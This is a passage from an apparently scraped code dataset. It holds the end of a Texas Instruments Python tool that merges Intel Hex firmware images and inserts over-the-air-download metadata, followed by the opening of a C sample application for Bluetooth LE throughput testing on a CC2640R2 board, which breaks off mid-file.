ret\n\n\n#Argparse is a class that helps to make friendlier command line interfaces.\n#the text you see below is what is printed as a form of documentation on how\n#to use the tool, similar to a man command\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=textwrap.dedent('''\\\n Merges Intel Hex format files provided as command line arguments or via stdin.\n Default output is Intel-Hex to stdout. Input via stdin and/or output via stdout\n implies --quiet\n\n Generates and inserts or appends metadata needed for Over the Air Download.\n\n Unless the location for the metadata structure is explicitly given as an\n argument with -m <addr>, one of the following will happen:\n 1. The lowest 16 bytes of the merged image is all 0xFF. In this case the meta-\n data is inserted here, and status is set to 0xFF.\n 2. The metadata is pre-pended to the hex and binary images, and status is set\n to 0xFE to indicate an OAD Host should not transmit this as part of the\n image data.\n\n The generated meta-data structure looks like this:\n\n [ 0 - 2 ][ 2 - 4 ][ 4 - 6 ][ 6 - 8 ][ 8-12 ][ 12 - 14 ][ 15 ][ 16 ]\n [ CRC ][ CRC-SHDW ][ imgVer ][ imgLen ][ usrId ][ imgAddr ][ imgType ][ stat ]\n [ calc' ][ 0xFFFF ][ (0) ][ calc'd ][ (\"EEEE\") ][ calc'd ][ (APP) ][ 0xFF ]\n\n '''),\n epilog=textwrap.dedent('''\\\n\n Usage examples:\n %(prog)s app.hex stack.hex -o - > merged_oad.hex\n Merges app.hex and stack.hex, filling in metadata from defaults.\n %(prog)s app.hex -ob app_oad.bin -m 0x1000 -r :0xE000\n Place metadata at 0x1000, and fill or cut off image at 0xE000, starting from\n first detected data location, output binary app.bin.\n '''))\n\n def auto_int(x):\n return int(x, 0)\n\n def auto_range(r):\n r = r.split(':')\n if len(r) == 1: r.append('')\n return [int(x, 0) if x != '' else None for x in r]\n\n def auto_usrId(usrId):\n usrId = usrId.strip()\n if ':' in usrId: usrId = ''.join([chr(int(x, 16)) for x in usrId.split(':')][:4])\n else: usrId = usrId[:4]\n return '\\x00' * (4-len(usrId)) + usrId\n\n def strip_path_filetype(*args, **kwargs):\n ft = argparse.FileType(*args, **kwargs)\n def inner(filename):\n if type(filename) is type(''):\n filename = filename.strip()\n if filename == '': filename = '-' # Blank means stdin/out\n return ft(filename)\n return inner\n\n #helper functions to aide in printing to the console\n def print_metadata(metaVector):\n hdr = metaVector._asdict()\n hdr['usrId'] = ':'.join(['%02X' % ord(x) for x in hdr['usrId']])\n print(textwrap.dedent(\"\"\"\n The script has calculated the 16 Byte OAD Metadata vector below\n\n Bytes: | 0 - 2 | 2 - 4 | 4 - 6 | 6 - 8 | 8-12 | 12 - 14 | 15 | 16 |\n Desc : | CRC | CRC-SHDW | imgVer | imgLen | usrId | imgAddr | imgType | stat |\n ---------------------------------------------------------------------------------------\n Data : | 0x{crc:04X} | 0x{crcShdw:04X} | {imgVer:=3d} | {imgLen:=6d} | {usrId:s} | {imgAddr:=6X} | {imgType:02X} | {status:02X} |\n ******************************************************************************************\n \"\"\".format(**hdr)))\n\n def print_console_header():\n print(textwrap.dedent(\"\"\"\n ******************************************************************************************\n Texas Instruments OAD Image Tool\n Version: {tool_version}\n ******************************************************************************************\n \"\"\".format(tool_version=tool_version)))\n\n def print_args_info(inputFileList, outHex, outBin, oadType, imgType, mergedHex):\n legalSegs = [(0, 0)]\n requiredSegs = [(0, 0)]\n if vargs.imgtype in ['app', 'stack']:\n if vargs.oadtype == 'offchip': legalSegs = [(0x1000, 0x1efff)] # 1-30 is legal\n elif vargs.oadtype == 'onchip': legalSegs = [(0x9000, 0x1efff)] # 9-30 is legal\n else:\n legalSegs = [(0, 0x20000)]\n requiredSegs = [(0, 0x3c), (0x20000-100, 0x20000)]\n\n mem_layout = mem_usage(0, 16, mergedHex.segments(), legalSegs, requiredSegs, mergedHex) +\\\n mem_usage(16, 32, mergedHex.segments(), legalSegs, requiredSegs, mergedHex)\n\n print(textwrap.dedent(\"\"\"\n OAD Type: {oadType}\n Img Type: {imgType}\n Input file(s): {inputFiles}\n Output Hex file: {outHex}\n Output Bin file: {outBin}\n\n Layout of concatenated input files, per flash sector, before applying --range.\n \"\"\".strip('\\n').format(\n oadType = oadType,\n imgType = imgType.upper(),\n inputFiles = ', '.join([os.path.basename(f) for f in inputFileList]),\n outHex = os.path.basename(outHex.name) if outHex else \"None\",\n outBin = os.path.basename(outBin.name) if outBin else \"None\",\n )))\n print(mem_layout)\n print(textwrap.dedent(\"\"\"\n Legend: `X` 100% full, `x` >50% full, `.` <50% full, `-` empty, `F` all 0xFF,\n `0` all 0x00.\n ******************************************************************************************\n Runtime Output:\n \"\"\".strip('\\n')))\n\n def addr_is_in_oad_imgspace(addr):\n #check if the provided address lies within the OAD image space\n #for on or offchip\n if vargs.oadtype == 'offchip':\n return INT_FL_RSVD_PG1 <= addr < INT_FL_RSVD_PG31\n elif vargs.imgtype == 'production':\n #oad imgA on chip app space is between end of pg0-9\n return INT_FL_OAD_IMG_A_BEGIN <= addr <= INT_FL_OAD_IMG_A_END\n else:\n #right now on chip OAD considers App space to be between pg9-30, which includes the stack.\n #assume for now that the user doesn't try to udpate the stack\n return INT_FL_OAD_IMG_B_META_BEGIN <= addr <= INT_FL_OAD_IMG_B_END\n\n\n def argument_sanity_check(vargs, mergedHex):\n #onchip OAD only supports app or production images\n if vargs.oadtype == 'onchip' and (vargs.imgtype == 'stack' or vargs.imgtype == 'np'):\n print(\"Fatal Error: -- Cannot perform \" + vargs.oadtype +\" OAD of \" + vargs.imgtype + \". Exiting.\")\n sys.exit(1)\n\n #off chip production images are a different beast, they need don't metadata\n #they simply need to merge (optionally convert to bin) and output\n #We need to make sure there is a BIM image included (a quick check of this is to see if any of the images start at 0)\n #alternatively, non-production images cannot contain data in page zero or page 31\n\n #Network processor images are not OAD aware, but are expected to start at pg0 (include int vects)\n #this is because the serial bootloader will start loading data at addr0\n if vargs.imgtype == 'production' or vargs.imgtype == 'np':\n if mergedHex.minaddr() != 0x00000:\n print(\"Fatal Error: -- \"+ vargs.imgtype.upper() + \" image must include must have data(intVects) at addr 0. Exiting.\")\n sys.exit(1)\n else:\n print(\"Data at Addr0, assume BIM/OAD Target App is present\")\n elif vargs.imgtype == 'app' or vargs.imgtype == 'stack':\n #else we are inspecting an OAD ready that is targeted for internal flash of SoC/AP\n #check to ensure that no data is placed invalid sectors pg 0-6,31 for onchip, pg0,31 for offchip\n testStartRange = vargs.range[0] if vargs.range and vargs.range[0] else mergedHex.minaddr()\n testEndRange = vargs.range[1] if vargs.range and vargs.range[1] else mergedHex.maxaddr()\n addrSegmentsList = mergedHex[testStartRange:testEndRange].segments()\n for seg in addrSegmentsList:\n #note that the end addr seems to not be inclusive so we need to do a minus 1\n if not addr_is_in_oad_imgspace(int(seg[0])) or not addr_is_in_oad_imgspace(int(seg[1] - 1)):\n print(\"Fatal Error: -- Non Production/NP image cannot have data in reserved pages. Exiting.\")\n sys.exit(1)\n #otherwise input hex ranges look valid\n #do checking on meta parameter\n if vargs.meta is not None:\n if vargs.oadtype == 'onchip' and vargs.imgtype == 'production':\n #on chip OAD target still has metadata\n #by default it resides at 0x0600, however, just be sure it doesn't reside in BIM\n if not (vargs.meta >= INT_FL_RSVD_PG1 and vargs.meta < INT_FL_RSVD_PG31):\n print(\"Fatal Error: -- OAD target image must reside in pg1. Exiting.\")\n sys.exit(1)\n elif vargs.oadtype == 'offchip' and vargs.imgtype == 'production':\n print(\"Info: -- Metadata isn't needed for production images for off chip OAD, skipping meta gen\")\n elif vargs.imgtype == 'app' or vargs.imgtype == 'stack':\n if not addr_is_in_oad_imgspace(vargs.meta):\n print(\"Warning: -- metadata specified within resident image space, attempting to place at app start.\")\n elif vargs.imgType == 'np':\n print(\"Warning: -- meta data cannot be embedded in NP image, ignoring meta generation\")\n #do range checking\n if vargs.range is not None:\n if vargs.imgtype == 'production' or vargs.imgtype == 'np':\n #production/np images should start at 0 include intvecs\n if vargs.range[0] != 0x0:\n print(\"Warning: -- production/np images should contain int vects...attempting to override\")\n else:\n #other images should have range within their app space\n #might have a potential off by one here\n if (vargs.range[0] and not addr_is_in_oad_imgspace(vargs.range[0])) or (vargs.range[1] and not addr_is_in_oad_imgspace(vargs.range[1])):\n print(\"Warning: -- range should be within oad app space.\")\n\n\n\n\n #setup the command line argument options\n parser.add_argument('hexfile', help=\"Path(s) to input image(s)\", nargs='*', type=strip_path_filetype('r'))\n parser.add_argument('-t', '--oadtype', help=\"Whether to generate hex files for on- or off-chip (ExtFlash) OAD\", choices=['onchip','offchip'], default='offchip')\n parser.add_argument('-i', '--imgtype', help=\"Defines the img type. For Onchip: only app and production are valid. For Offchip: app, stack, prodcution, np are valid\",\n choices=['app', 'stack', 'np', 'production'], default='app')\n parser.add_argument('-v', '--imgVer', help=\"Defines the version of the application to be downloaded\", type=auto_int, default=0)\n parser.add_argument('-o', '--out', help='Path to output hex file.', type=strip_path_filetype('w'))\n parser.add_argument('--usrId', help='Metadata UsrId. 4 bytes. Ex EEEE or 45:45:45:45', default='EEEE', type=auto_usrId)\n parser.add_argument('-ob', '--outbin', help='Path to output bin file.', type=strip_path_filetype('wb'), nargs='?')\n parser.add_argument('-f', '--fill', help='Filler data in output [0xff]', type=auto_int, default=0xff)\n parser.add_argument('-m', '--meta', help='Override calculated location of metadata', type=auto_int)\n #parser.add_argument('-c', '--crc', help='Override generated CRC value', type=auto_int)\n parser.add_argument('-r', '--range', help='Range of addresses included in output', type=auto_range)\n #parser.add_argument('-l', '--len', help='Override calculated image length [bytes]', type=auto_int)\n parser.add_argument('-q', '--quiet', action='store_true', help='Do not produce diagnostic and informational output', default=False)\n parser.add_argument('--round', help='Round up end-address to fill nearest X, for example 4096 if sectors are 4kB. Ignored if end-range given', type=auto_int)\n parser.add_argument('--version', action='version', version=(parser.prog + ' ' + tool_version))\n\n #parse the user's command line arguments\n if len(sys.argv[1:]) == 0:\n parser.print_help()\n # parser.print_usage() # for just the usage line\n parser.exit()\n\n vargs = parser.parse_args()\n\n if vargs.out is None and vargs.outbin is None:\n print(\">> Missing output file(s)\\n\")\n parser.print_usage()\n parser.exit()\n\n # Determine if normal output should be presented\n if vargs.quiet or (vargs.hexfile and vargs.hexfile[0] is sys.stdin) or (vargs.out and vargs.out is sys.stdout) or (vargs.outbin and vargs.outbin is sys.stdout):\n oldPrint = __builtin__.print\n def myprint(*args, **kwargs):\n pass\n __builtin__.print = myprint\n\n # first, print a neat header\n print_console_header()\n\n # Parse and merge hex files\n #iterate over input hexfiles, intelhexify them\n #if we cannot merge or open the hex files, the script is hosed, print and abort\n ihs = []\n inputFileNames = []\n mergedHex = IntelHex()\n\n for f in vargs.hexfile:\n try:\n ih = IntelHex(f)\n inputFileNames.append(f.name)\n ihs.append(ih)\n try:\n mergedHex.merge(ih, overlap='replace')\n except:\n print(\"Fatal Error: -- FAILED merge due to overlap when merging \" + f.name)\n sys.exit(1)\n except:\n print(\"Fatal Error: -- FAILED parsing input hex file(s)\")\n sys.exit(1)\n\n #print information about the input hex files\n print_args_info(inputFileNames, vargs.out, vargs.outbin, vargs.oadtype, vargs.imgtype, mergedHex)\n\n #Now that we have a merged hex image, lets do a bunch of arg checking\n #since mergedHex is an merge of all input hexes, it can be treated as an argument to the script\n argument_sanity_check(vargs, mergedHex)\n\n\n # Cut off / fill with --fill.\n startAddr = mergedHex.minaddr()\n endAddr = mergedHex.addresses()[-1] + 1 # Inclusive address\n\n if startAddr % OAD_BLOCK_SIZE:\n print(\"Fatal Error: -- Start address 0x%X is not divisible by 16. Exiting\")\n sys.exit(1)\n\n # DevMon rounds up to nearest sector. Why not, if they want to waste time and space.\n if vargs.round is not None:\n endAddr = ((endAddr + INT_FL_PG_SIZE) & ~(INT_FL_PG_SIZE-1))\n print ('endAddr round', hex(endAddr))\n\n if vargs.range is not None:\n if vargs.range[0] is not None: startAddr = vargs.range[0]\n if vargs.range[1] is not None: endAddr = vargs.range[1]\n\n # Make sure the last address is divisible by 16\n remainder = endAddr % OAD_BLOCK_SIZE\n if remainder:\n print(\"Last address was 0x%0X. Expanded to 0x%0X to be divisible by OAD block size\" % (endAddr, endAddr+(OAD_BLOCK_SIZE-remainder)) )\n endAddr += OAD_BLOCK_SIZE - remainder\n\n #if specified, the script will pad the image with the pad value\n fillHex = IntelHex()\n fillHex.puts(startAddr, struct.pack('B', vargs.fill) * (endAddr))\n mergedHex.merge(fillHex, 'ignore')\n mergedHex = mergedHex[startAddr:endAddr] # +1 since the last address is not inclusive\n mergedHex.padding = vargs.fill\n\n\n #if we are calculating metadata\n #Offchip OAD production images and NP images don't have embedded metadata headers, skip meta data calc for these\n #All onchip OAD images need metdata placement\n if not(vargs.oadtype == 'offchip' and (vargs.imgtype == 'production' or vargs.imgtype == 'np')):\n # Place metadata, onchip production image expects header at 0x600\n if vargs.oadtype == 'onchip' and vargs.imgtype == 'production':\n residentHdr = OadHdr._make(struct.unpack(OAD_HDR_FMT, mergedHex.tobinstr(INT_FL_OAD_IMG_A_META_BEGIN, INT_FL_OAD_IMG_A_META_BEGIN+15)))\n else:\n residentHdr = OadHdr._make(struct.unpack(OAD_HDR_FMT, mergedHex.tobinstr(startAddr, startAddr+15)))\n metaAddr = vargs.meta\n if metaAddr is None:\n # Try first address, ideally there should be free space at the beginning of the image\n #in the reserved image metadata sector\n #if onchip production image, we must start at imgA start with is 0x600\n if vargs.oadtype == 'onchip' and vargs.imgtype == 'production':\n attemptedMetaStart = INT_FL_OAD_IMG_A_META_BEGIN\n else:\n attemptedMetaStart = mergedHex.minaddr()\n\n beginning = mergedHex.gets(attemptedMetaStart, OAD_METADATA_SIZE)\n\n\n blank16 = struct.pack('B', 0xff)*OAD_METADATA_SIZE\n if beginning == blank16:\n metaAddr = attemptedMetaStart\n print (\"Found free area at start of address range, metalocation: 0x%08X\" % metaAddr)\n\n else:\n # there are two cases to be checked by this else:\n # 1.Is there already metadata embedded in the image\n # - we verify this by checking if imgLen <= actual size and if crc == crc\n # 2.There is no metadata in the image, and no metadata addr is specified\n # - We will look to see if there room for metadata based on start addr\n # - remember that for current on OAD solution metadata must reside\n # - in one of two places defined by EXT_FL_OAD_META_BEGIN, INT_FL_OAD_META_BEGIN\n\n #first lets assume the first 16B are meta data and see that proves correct\n if vargs.oadtype == 'onchip' and vargs.imgtype == 'production':\n hexHdr = OadHdr._make(struct.unpack(OAD_HDR_FMT, mergedHex.tobinstr(INT_FL_OAD_IMG_A_META_BEGIN, INT_FL_OAD_IMG_A_META_BEGIN+15)))\n else:\n hexHdr = OadHdr._make(struct.unpack(OAD_HDR_FMT, mergedHex.tobinstr(startAddr, startAddr+15)))\n\n if vargs.oadtype == 'onchip' and vargs.imgtype == 'production':\n crcBin = mergedHex.tobinstr(INT_FL_OAD_IMG_A_META_BEGIN+4, INT_FL_OAD_IMG_A_END-1)\n localLen = int(math.ceil((INT_FL_OAD_IMG_A_END - INT_FL_OAD_IMG_A_META_BEGIN) / 4.0))\n else:\n crcBin = mergedHex.tobinstr(startAddr+4, endAddr-1)\n localLen = int(math.ceil((mergedHex.maxaddr() - mergedHex.minaddr()) / 4.0))\n\n\n localCrc = crc16(crcBin)\n #if the resident header checks out, then we will assume metaAddr==startAddr\n #note that the script will still over-write what is currently there\n if localCrc == hexHdr.crc and hexHdr.crcShdw == 0xFFFF and hexHdr.imgLen <= localLen:\n metaAddr = startAddr\n print(\"Resident metadata detected, using metaAddr = startAddr (0x%08X)\", startAddr)\n print(\"Note: Resident metadata will still be overwritten\")\n else:\n # See if the range leaves room\n if vargs.range is None or vargs.range[0] is None:\n # First address was not specified, expand backwards\n if vargs.oadtype == 'onchip' and vargs.imgtype == 'production':\n #TODO, remember imgA start and try to start with 16B offset from here, until then assume it is here\n metaAddr = INT_FL_OAD_IMG_A_META_BEGIN\n startAddr = INT_FL_OAD_IMG_A_META_BEGIN\n else:\n metaAddr = startAddr - 0x10\n startAddr = metaAddr\n if addr_is_in_oad_imgspace(metaAddr):\n print(\"Expanded address range. Placed metadata at 0x%08X\" % metaAddr)\n else:\n print(\"Fatal Error: -- Could not find free area for metadata before 0x%08X. Exiting.\" % startAddr)\n sys.exit(1)\n else:\n #maybe improve this comment\n print(\"Fatal Error: -- Could not find free area for metadata in --range specified to start at 0x%08X. Exiting.\" % vargs.range[0])\n sys.exit(1)\n else:\n # User provided metadata location\n # Given current OAD method there is a fixed location for metadata given the OAD method (on or off chip)\n if vargs.oadtype == 'onchip' and vargs.imgtype == 'production':\n imgStartAddr = INT_FL_OAD_IMG_A_META_BEGIN\n else:\n imgStartAddr = startAddr\n\n if metaAddr > imgStartAddr or not addr_is_in_oad_imgspace(metaAddr):\n print(\"Fatal Error: -- Metadata must be at the start, additionally, must be within APP+STACK bounds. Exiting.\" % metaAddr)\n sys.exit(1)\n else:\n # Trust the user\n print(\"Placing metadata at 0x%08X\" % metaAddr)\n startAddr = metaAddr\n\n # Calculate metadata\n if vargs.oadtype == 'onchip' and vargs.imgtype == 'production':\n imgLen = int(math.ceil((INT_FL_OAD_IMG_A_END - INT_FL_OAD_IMG_A_META_BEGIN) / 4.0)) # Image length in words\n imgVer = 0 << 1 # LSB means A/B .... TODO\n elif vargs.oadtype == 'onchip':\n imgLen = int(math.ceil((endAddr - startAddr) / 4.0)) # Image length in words\n imgVer = 1 # LSB means A/B .... TODO\n else:\n imgLen = int(math.ceil((endAddr - startAddr) / 4.0)) # Image length in words\n imgVer = vargs.imgVer # LSB means A/B .... TODO\n\n\n usrId = vargs.usrId\n imgAddr = startAddr / 4 # In words\n imgType = imgTypes[vargs.imgtype]\n crcShdw = 0xffff\n\n meta = struct.pack('HHHH4sHBB', crcShdw, crcShdw, imgVer, imgLen, usrId, imgAddr, imgType, META_STATUS_SUCCESS)\n mergedHex.puts(metaAddr, meta)\n #production image only calculates over imgA region\n if vargs.oadtype == 'onchip' and vargs.imgtype == 'production':\n asBin = mergedHex.tobinstr(INT_FL_OAD_IMG_A_META_BEGIN, INT_FL_OAD_IMG_A_END)\n else:\n asBin = mergedHex.tobinstr(startAddr, endAddr-1)\n crc = crc16(asBin[4:])\n mergedHex.puts(metaAddr, struct.pack('H', crc))\n\n metaVector = OadHdr._make([crc, crcShdw, imgVer, imgLen, usrId, imgAddr, imgType, META_STATUS_SUCCESS])\n\n print_metadata(metaVector)\n\n\n if vargs.out and not (vargs.out is sys.stdout and vargs.outbin is sys.stdout):\n print(\"Writing to:\\n\", vargs.out.name)\n try:\n mergedHex.write_hex_file(vargs.out)\n vargs.out.flush()\n except IOError as e:\n if vargs.out is sys.stdout: pass\n else: raise e\n\n # Output binary\n if vargs.outbin is not None:\n print(\"Writing to:\\n\", vargs.outbin.name)\n try:\n vargs.outbin.write(mergedHex.tobinstr(startAddr, endAddr-1))\n vargs.outbin.flush()\n except IOError as e:\n if vargs.outbin is sys.stdout: pass\n else: raise e\n\n\n print(\"******************************************************************************************\")\n print(\"Success\")\n print(\"******************************************************************************************\")\n\n # Clean up pipes, silently ignore broken pipe\n try:\n sys.stdout.close()\n except IOError:\n pass\n\n try:\n sys.stderr.close()\n except IOError:\n pass"
},
{
"alpha_fraction": 0.5896576642990112,
"alphanum_fraction": 0.5991590619087219,
"avg_line_length": 29.023361206054688,
"blob_id": "d475cdf945077ad8b5ff220f144ac2149656a185",
"content_id": "70094ce04ded41c3f91b4f7adab47e28bb50d9cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 66832,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 2226,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_central/src/app/throughput_central.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/******************************************************************************\n\n @file throughput_central.c\n\n @brief This file contains the Throughput Central sample application for use\n with the CC2650 Bluetooth Low Energy Protocol Stack.\n\n Group: CMCU, SCS\n Target Device: CC2640R2\n\n ******************************************************************************\n\n Copyright (c) 2013-2017, Texas Instruments Incorporated\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions\n are met:\n\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n * Neither the name of Texas Instruments Incorporated nor the names of\n its contributors may be used to endorse or promote products derived\n from this software without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n*****************************************************************************/\n\n/*********************************************************************\n * INCLUDES\n */\n#include <string.h>\n\n#include <ti/sysbios/knl/Task.h>\n#include <ti/sysbios/knl/Clock.h>\n#include <ti/sysbios/knl/Event.h>\n#include <ti/sysbios/knl/Queue.h>\n#include <ti/sysbios/hal/Hwi.h>\n\n#include <ti/display/Display.h>\n\n#include \"bcomdef.h\"\n\n#include <icall.h>\n#include \"util.h\"\n/* This Header file contains all BLE API and icall structure definition */\n#include \"icall_ble_api.h\"\n\n#include \"central.h\"\n\n#include \"board_key.h\"\n#include <menu/two_btn_menu.h>\n\n#include \"throughput_central_menu.h\"\n#include \"throughput_service.h\"\n\n#include \"board.h\"\n\n#include \"throughput_central.h\"\n\n#include \"ble_user_config.h\"\n\n/*********************************************************************\n * MACROS\n */\n\n/*********************************************************************\n * CONSTANTS\n */\n\n// These Constants are for Application Queue Events\n// These Events contain information on the Queue and need to be processed\n#define SBC_STATE_CHANGE_EVT 0x0001\n#define SBC_KEY_CHANGE_EVT 0x0002\n#define SBC_RSSI_READ_EVT 0x0004\n#define SBC_PDU_UPDATE_EVT 0x0008\n#define SBC_PHY_UPDATE_EVT 0x0010\n#define SBC_MEASURE_INST_SPEED_EVT 0x0020\n\n// Simple BLE Central Task Events - often containing no information to process\n// other than the event itself\n#define SBC_ICALL_EVT ICALL_MSG_EVENT_ID // Event_Id_31\n#define SBC_QUEUE_EVT UTIL_QUEUE_EVENT_ID // Event_Id_30\n#define SBC_START_DISCOVERY_EVT Event_Id_00\n#define SBC_MEASURE_AVG_SPEED_EVT Event_Id_01\n#define SBC_TOGGLE_THROUGHPUT_EVT Event_Id_02\n\n#define SBC_ALL_EVENTS (SBC_ICALL_EVT | \\\n SBC_QUEUE_EVT | \\\n SBC_START_DISCOVERY_EVT | \\\n SBC_MEASURE_AVG_SPEED_EVT | \\\n SBC_TOGGLE_THROUGHPUT_EVT)\n\n// Maximum number of scan responses\n#define DEFAULT_MAX_SCAN_RES 8\n\n// Scan duration in ms\n#define DEFAULT_SCAN_DURATION 4000\n\n// Discovery mode (limited, general, all)\n#define DEFAULT_DISCOVERY_MODE DEVDISC_MODE_ALL\n\n// TRUE to use active scan\n#define DEFAULT_DISCOVERY_ACTIVE_SCAN TRUE\n\n// TRUE to use white list during discovery\n#define DEFAULT_DISCOVERY_WHITE_LIST FALSE\n\n// TRUE to use high scan duty cycle when creating link\n#define DEFAULT_LINK_HIGH_DUTY_CYCLE FALSE\n\n// TRUE to use white list when creating link\n#define DEFAULT_LINK_WHITE_LIST FALSE\n\n// Default RSSI polling period in ms\n#define DEFAULT_RSSI_PERIOD 4000\n\n// Whether to enable automatic parameter update request when a connection is\n// formed\n#define DEFAULT_ENABLE_UPDATE_REQUEST GAPCENTRALROLE_PARAM_UPDATE_REQ_AUTO_ACCEPT\n\n// Minimum connection interval (units of 1.25ms) if automatic parameter update\n// request is enabled\n#define DEFAULT_UPDATE_MIN_CONN_INTERVAL 400\n\n// Maximum connection interval (units of 1.25ms) if automatic parameter update\n// request is enabled\n#define DEFAULT_UPDATE_MAX_CONN_INTERVAL 800\n\n// Slave latency to use if automatic parameter update request is enabled\n#define DEFAULT_UPDATE_SLAVE_LATENCY 0\n\n// Supervision timeout value (units of 10ms) if automatic parameter update\n// request is enabled\n#define DEFAULT_UPDATE_CONN_TIMEOUT 100\n\n// Default service discovery timer delay in ms\n#define DEFAULT_SVC_DISCOVERY_DELAY 3000\n\n#define CODED_PHY_CHANGE_DELAY 500\n\n// Type of Display to open\n#if defined(BOARD_DISPLAY_USE_LCD) && (BOARD_DISPLAY_USE_LCD!=0)\n #define SBC_DISPLAY_TYPE Display_Type_LCD\n#elif defined (BOARD_DISPLAY_USE_UART) && (BOARD_DISPLAY_USE_UART!=0)\n #define SBC_DISPLAY_TYPE Display_Type_UART\n#else // !BOARD_DISPLAY_USE_LCD && !BOARD_DISPLAY_USE_UART\n #define SBC_DISPLAY_TYPE 0 // Option not supported\n#endif // BOARD_DISPLAY_USE_LCD && BOARD_DISPLAY_USE_UART\n\n// Row numbers\n#define SBC_ROW_RESULT TBM_ROW_APP\n#define SBC_ROW_STATUS_1 (TBM_ROW_APP + 1)\n#define SBC_ROW_STATUS_2 (TBM_ROW_APP + 2)\n#define SBC_ROW_PEER_DEVICE (TBM_ROW_APP + 2)\n#define SBC_ROW_STATUS_3 (TBM_ROW_APP + 3)\n#define SBC_ROW_PHY (TBM_ROW_APP + 3)\n#define SBC_ROW_STATUS_4 (TBM_ROW_APP + 4)\n#define SBC_ROW_INST_THROUGHPUT (TBM_ROW_APP + 4)\n#define SBC_ROW_AVG_THROUGHPUT (TBM_ROW_APP + 5)\n#define SBC_ROW_RSSI (TBM_ROW_APP + 6)\n#define SBC_ROW_BDADDR (TBM_ROW_APP + 8)\n#define SBC_ROW_ROLESTATE (TBM_ROW_APP + 9)\n//#define SBC_ROW_GATT_RESULT (TBM_ROW_APP + 10)\n#define SBC_ROW_PDU (TBM_ROW_APP + 10)\n#define SBC_ROW_MTU (TBM_ROW_APP + 11)\n\n// Task configuration\n#define SBC_TASK_PRIORITY 1\n\n#ifndef SBC_TASK_STACK_SIZE\n#define SBC_TASK_STACK_SIZE 864\n#endif\n#define DLE_MAX_PDU_SIZE 251\n#define DLE_MAX_TX_TIME 17040\n\n#define DEFAULT_PDU_SIZE 27\n#define DEFAULT_TX_TIME 328\n\n// Application states\nenum\n{\n BLE_STATE_IDLE,\n BLE_STATE_CONNECTING,\n BLE_STATE_CONNECTED,\n BLE_STATE_DISCONNECTING\n};\n\n// Discovery states\nenum\n{\n BLE_DISC_STATE_IDLE, // Idle\n BLE_DISC_STATE_MTU, // Exchange ATT MTU size\n BLE_DISC_STATE_SVC, // Service discovery\n BLE_DISC_STATE_CHAR // Characteristic discovery\n};\n\n/*********************************************************************\n * TYPEDEFS\n */\n\n// App event passed from profiles.\ntypedef struct\n{\n appEvtHdr_t hdr; // event header\n uint8_t *pData; // event data\n} sbcEvt_t;\n\n// RSSI read data structure\ntypedef struct\n{\n uint16_t period; // how often to read RSSI\n uint16_t connHandle; // connection handle\n Clock_Struct *pClock; // pointer to clock struct\n} readRssi_t;\n\n// A struct to contain scan response data we're interested in\n// Nameless struct typedefed to scanResultDeviceRecord_t\ntypedef struct\n{\n uint8 addrType; //!< Address Type: @ref GAP_Addr_Types\n uint8 addr[B_ADDR_LEN]; //!< Device's Address\n uint8 advertLen; //!< Length of Advertisement Data\n uint8* advertData; //!< Pointer Adv Data\n uint8 scanLen; //!< Length of Scan Response Data\n uint8* scanRsp; //!< Pointer Scan Response\n} scanResultDeviceRecord_t;\n\ntypedef struct\n{\n uint16_t charHdl; //!< Characteristic Handle\n uint8 addr[ATT_UUID_SIZE]; //!< UUID of characteristic\n} throughputProfileHdl_t;\n\n/*********************************************************************\n * GLOBAL VARIABLES\n */\n\n// Display Interface\nDisplay_Handle dispHandle = NULL;\n\n/*********************************************************************\n * EXTERNAL VARIABLES\n */\n\n/*********************************************************************\n * LOCAL VARIABLES\n */\n\n// Entity ID globally used to check for source and/or destination of messages\nstatic ICall_EntityID selfEntity;\n\n// Event globally used to post local events and pend on system and\n// local events.\nstatic ICall_SyncHandle syncEvent;\n\n// Clock object used to signal timeout\nstatic Clock_Struct startDiscClock;\nstatic Clock_Struct speedClock;\nstatic Clock_Struct startPHYClock;\n\n// Queue object used for app messages\nstatic Queue_Struct appMsg;\nstatic Queue_Handle appMsgQueue;\n\n// Task configuration\nTask_Struct sbcTask;\nChar sbcTaskStack[SBC_TASK_STACK_SIZE];\n\n// GAP GATT Attributes\nstatic const uint8_t attDeviceName[GAP_DEVICE_NAME_LEN] = \"BLE5 Central\";\n\n// Number of scan results and scan result index\nstatic uint8_t scanRes = 0;\nstatic int8_t scanIdx = -1;\n\n// Scan result list\nstatic scanResultDeviceRecord_t devList[DEFAULT_MAX_SCAN_RES];\n\n// Connection handle of current connection\nstatic uint16_t connHandle = GAP_CONNHANDLE_INIT;\n\n// Application state\nstatic uint8_t state = BLE_STATE_IDLE;\n\n// Discovery state\nstatic uint8_t discState = BLE_DISC_STATE_IDLE;\n\n// Discovered service start and end handle\nstatic uint16_t svcStartHdl = 0;\nstatic uint16_t svcEndHdl = 0;\n\n// Maximum PDU size (default = 27 